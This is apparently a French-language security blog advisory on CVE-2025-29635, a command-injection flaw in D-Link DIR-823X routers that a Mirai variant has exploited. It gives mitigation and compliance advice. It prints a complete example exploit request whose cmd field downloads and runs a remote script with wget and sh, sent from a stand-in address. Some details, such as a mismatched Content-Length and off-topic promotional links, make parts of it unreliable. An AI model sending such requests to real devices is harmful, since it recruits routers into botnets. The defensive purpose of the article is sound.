CVE-2025-29635 : une faille critique qui rend les routeurs D-Link DIR-823X vulnérables aux campagnes Mirai en 2026

Théophane Villedieu

CVE-2025-29635 : une faille critique qui met les routeurs D-Link DIR-823X en danger

En 2026, plus de 30 % des attaques DDoS observées en Europe exploitent des appareils IoT non patchés, selon le Cisco Threat Landscape 2026. Parmi ces appareils, les routeurs D-Link DIR-823X figurent en première ligne, non pas à cause de leurs performances, mais à cause d’une vulnérabilité récemment mise en lumière : CVE-2025-29635. Cette faille, classée high severity par le CVE, permet l’exécution de commandes arbitraires via une requête POST malveillante. Dans la pratique, elle a déjà été utilisée par une campagne Mirai pour recruter des milliers d’appareils en plein cœur du réseau français. Le présent guide détaille le mécanisme technique, l’impact opérationnel et les mesures concrètes que chaque administrateur doit mettre en œuvre dès maintenant, notamment en suivant la formation cybersécurité sans diplôme – guide pas à pas 2026.

Axe 1 - Analyse technique de la vulnérabilité CVE-2025-29635

Fonctionnement du vecteur d’injection de commande

Le point d’entrée de la faille se situe sur le chemin /goform/set_prohibiting du firmware D-Link DIR-823X, version 240126 ou 24082. Lorsqu’un attaquant envoie une requête POST contenant le paramètre cmd suivi de toute chaîne de caractères, le routeur interprète la chaîne comme une commande système sans aucune validation. Cette absence de filtrage déclenche une exécution de code à distance (RCE). La requête typique ressemble à :

POST /goform/set_prohibiting HTTP/1.1
Host: 192.0.2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

cmd=cd%20/tmp&&wget%20http://198.51.100.7/dlink.sh&&sh%20dlink.sh

Dans cet exemple, le routeur télécharge un script malveillant (dlink.sh) depuis un serveur distant, puis l’exécute, ouvrant la porte à un payload Mirai, comme le décrit l’article sur les applications frauduleuses de portefeuille crypto qui volent vos actifs. Les chercheurs d’Akamai ont observé que les POST contenaient fréquemment des chemins de traversée (../../) pour atteindre des répertoires écrits, ce qui amplifie le périmètre d’impact.

Preuve de concept et retrait du PoC

Les chercheurs originaux, Wang Jinshuai et Zhao Jiangting, ont publié un PoC sur GitHub avant de le retirer, invoquant des risques de diffusion incontrôlée. Leur démonstration, bien que courte, illustrait la capacité d’un simple curl à prendre le contrôle du routeur. Après le retrait, la communauté a remarqué un pic d’activité sur les honeypots d’Akamai, corroborant l’existence d’acteurs malveillants prêts à exploiter le défaut. Cette dynamique montre que la divulgation responsable n’est efficace que si le fabricant publie rapidement un correctif, ce qui n’est malheureusement pas le cas pour les modèles EoL (end-of-life).

“The Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026”, indique le rapport d’Akamai.

Axe 2 - Impact opérationnel et scénarios d’attaque

Mirai et le payload tuxnokill

Le malware installé par le script dlink.sh porte le nom de tuxnokill, une variante de Mirai capable de s’exécuter sur plusieurs architectures (ARM, MIPS, x86). Une fois le binaire présent sur le routeur, il rejoint le serveur de commande et contrôle (C&C) du botnet, prêt à lancer des attaques DDoS de type TCP SYN, UDP flood ou HTTP null. Selon le rapport annuel de l’ANSSI 2025, 38 % des incidents IoT sont liés à des botnets similaires, soulignant la menace persistante des appareils non maintenus.

Conséquences pour les réseaux d’entreprise

Dans un scénario typique, un routeur compromis devient un point d’accès interne, permettant à l’attaquant de pivoter vers d’autres services. Les organisations ont signalé des lenteurs de réseau, des coupures intermittentes et des alertes de trafic inhabituel sur leurs firewalls. Par ailleurs, la persistance du malware sur un équipement EoL complique la détection, car les signatures AV ne sont souvent pas mises à jour pour ces modèles. Le coût moyen d’une remise en service après compromission d’un routeur IoT s’élève à 12 000 €, d’après une étude de Kaspersky 2026.

“Active exploitation of CVE-2025-29635 demonstrates that even outdated consumer routers can become the backbone of large-scale DDoS campaigns”, résume le rapport d’Akamai.

Axe 3 - Gestion du risque et conformité

Références réglementaires et bonnes pratiques ANSSI

En France, l’ANSSI recommande dans son Guide d’hygiène du réseau (édition 2024) que tout équipement IoT atteint la fin de vie doit être retiré ou isolé. Cette recommandation s’aligne avec le RGPD, qui impose une protection adéquate des données personnelles contre les risques de compromission. De plus, la norme ISO 27001 oblige les organisations à maintenir un inventaire à jour des actifs et à planifier des mises à jour de sécurité régulières. La non-conformité à ces exigences expose les entreprises à des sanctions pouvant atteindre 4 % du chiffre d’affaires annuel.

Comparaison des options de mitigation

Option de mitigationAvantagesInconvénientsCoût estimé (€/unité)
Mise à jour du firmware (si disponible)Répare la faille sans changer le hardwareRare pour les modèles EoL0-30
Segmentation du réseau (VLAN)Limite la portée du compromisNécessite une reconfiguration réseau50-150
Remplacement du routeur par un modèle supportéÉlimine la vulnérabilité définitivementInvestissement initial élevé80-200
Désactivation de l’administration distanteRéduit la surface d’attaquePerte de certaines fonctionnalités d’accès0-10

Les organisations doivent peser ces critères en fonction de leurs contraintes budgétaires et de leur niveau de risque. La solution la plus robuste reste le remplacement du matériel EoL, surtout lorsqu’il s’agit de points d’accès critiques.

Mise en œuvre - Étapes concrètes pour sécuriser vos équipements

  1. Inventorier tous les routeurs D-Link DIR-823X présents dans votre infrastructure. Utilisez un scanner de ports comme Nmap pour repérer les appareils répondant sur le port 80/443.
  2. Vérifier la version du firmware ; si elle correspond aux versions 240126 ou 24082, considérez le dispositif comme potentiellement vulnérable.
  3. Appliquer immédiatement les mesures de contournement : désactiver l’accès HTTP(S) depuis l’extérieur, changer le mot de passe admin par défaut et désactiver le service set_prohibiting via l’interface de configuration.
  4. Isoler les routeurs EoL dans un VLAN dédié, sans routes vers les serveurs internes, afin de limiter toute tentative de pivot.
  5. Planifier le remplacement du matériel d’ici le 31 décembre 2026, en conformité avec les exigences de l’ANSSI et du RGPD.
  6. Surveiller les logs du réseau à la recherche de requêtes POST suspectes vers /goform/set_prohibiting. Un script de détection automatisée peut alerter en temps réel via un SIEM.

Liste de contrôle rapide

  • Changement du mot de passe admin
  • Désactivation de l’administration distante
  • Segmentation réseau du trafic IoT
  • Vérification du dernier firmware disponible
  • Plan de remplacement matériel

Conclusion - Prochaines actions pour se prémunir contre la menace

En 2026, la vulnérabilité CVE-2025-29635 illustre clairement que les appareils hors de support représentent une faille stratégique pour les cybercriminels. Ne pas ignorer ces équipements équivaut à accepter un point d’accès ouvert dans votre architecture. En suivant les étapes décrites, vous renforcez votre posture de sécurité, vous respectez les exigences réglementaires françaises et vous réduisez significativement le risque d’être intégré à un botnet Mirai. La prochaine action ? Démarrez dès aujourd’hui votre audit d’inventaire et engagez le processus de remplacement pour tous les routeurs EoL, afin de protéger votre réseau contre les attaques de demain.